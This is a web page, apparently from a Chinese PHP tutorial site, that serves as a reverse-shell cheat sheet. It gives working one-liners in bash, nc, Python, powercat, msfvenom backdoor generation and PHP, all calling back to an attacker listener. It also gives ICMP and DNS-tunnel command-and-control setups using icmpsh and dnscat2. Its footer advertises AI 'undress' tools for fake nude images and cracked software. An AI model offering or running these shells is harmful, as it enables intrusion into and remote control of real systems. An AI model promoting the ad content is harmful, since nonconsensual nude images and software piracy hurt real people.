1.bash rebound
bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc rebound
nc -e /bin/sh 192.168.2.130 4444
3.python
import socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ])
4.powercat
Import-Module .\powercat.ps1 powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf generates exe backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
6.php rebound shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
关闭icmp响应,不然shell一直跳,恢复是0
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135
Running in windows7:
icmpsh.exe -t 192.168.2.137
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb
kaliruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com
In windows7:
./dnscat --dns server=192.168.2.130,port=53531 ./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥) ./dnscat xxx.comAfter successful connection
quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)
连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):
clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)</id></id>
DNS tunnel forwardinglisten 127.0.0.1:6666 192.168.2.135:80
本机的6666就可以访问80端口
The above is the detailed content of What are the rebound shells?. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
WebStorm Mac version
Useful JavaScript development tools
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
SublimeText3 English version
Recommended: Win version, supports code prompts!
Zend Studio 13.0.1
Powerful PHP integrated development environment
